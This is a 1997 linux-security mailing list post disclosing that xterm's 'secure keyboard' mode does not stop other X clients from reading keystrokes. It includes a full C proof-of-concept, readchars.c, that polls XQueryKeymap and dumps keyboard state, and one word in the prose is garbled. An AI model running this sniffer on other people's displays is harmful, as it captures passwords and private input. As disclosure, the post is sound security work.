|
Date: Mon, 6 Oct 1997 21:55:27 +0100 (MET) From: Christopher Creutzig <christopher@nescio.foebud.org> To: linux-security@redhat.com Subject: [linux-security] xterm "secure console" insecure [The following text is in the "ISO-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] Dear Rogier, some time ago I laid claim that xterm's "secure console" feature was by no means secure. You asked me to demonstrate this to you before you were to forward my message to linux-security. Please find enclosed the program I use as proof-of-concept. ------------------- Dear readers, please find enclosed a program illustrating a problem with xterm "secure keyboard" and other programs claiming some method of allowing you to type in passwords etc. securely even though untrusted applications have access to your X server. Personally, I had heard about this problem some time ago, but a message of mine stating this problem in a different discussions had not been approved to linux-security because "quite a number of people good at security think it's sufficient to use 'secure keyboard'", so I wrote a small demonstration program. (It's actually my first X program, so son't be surprised if it looks very inexperienced.) What the program does is, it connects to the X display specified in the environment variable DISPLAY and reads the keybord status 100 times per second. Every time the keyboard status changes, it dumps the data returned by XQueryKeymap to its output. It does not try to figure out the actual keys depressed, but then it's only supposed to be proof-of-concept. It works for me on RedHat 4.0, but as far as I know, nothing has been changed with regard to this problem in more recent versions of XFr c7e ee86. I have not verified the presence of this problem on other machines yet. --8<-- /* readchars.c Read everything typed on an X terminal you're allowed to connect to. Copyright (C) 1997 Christopher Creutzig */ #include <X11/Xlib.h> #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> int main(int argc, char **argv) { Display *disp; int i, changed; char *s; struct timeval shorttime; char keys[32]; char lastkeys[32]; shorttime.tv_sec = 0; shorttime.tv_usec = 10; s = getenv("DISPLAY"); disp = XOpenDisplay(s); if (NULL==disp) { fprintf(stderr, "%s: can't open display %s\n", argv[0], s); exit(1); } for(i=0; i<32; i++) { keys[i] = 0; lastkeys[i] = 1; } while(1) { select(0, NULL, NULL, NULL, &shorttime); XQueryKeymap(disp, keys); changed = 0; for(i=0; i<32; i++) { if (keys[i] != lastkeys[i]) changed = 1; lastkeys[i] = keys[i]; } if (changed) { printf("Keyboard status:\n "); for (i=0; i<32; i++) printf("%02x ", (unsigned char)keys[i]); printf("\n\n"); } } XCloseDisplay(disp); return 0; } -->8-- (Yes I know it never reaches XCloseDisplay, I just think it looks cleaner this way... :-)) -- Christopher Creutzig # Im Samtfelde 19 # D-33098 Paderborn # V+49-5251-71873 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Für Wichtiges: Zur Zeit lese ich Mail an 'ccr@mupad.de' deutlich öfter. -- ---------------------------------------------------------------------- Please refere to the information about this list as well as general information about Linux security at http://www.aoy.com/Linux/Security. ---------------------------------------------------------------------- To unsubscribe: mail -s unsubscribe test-list-request@redhat.com < /dev/null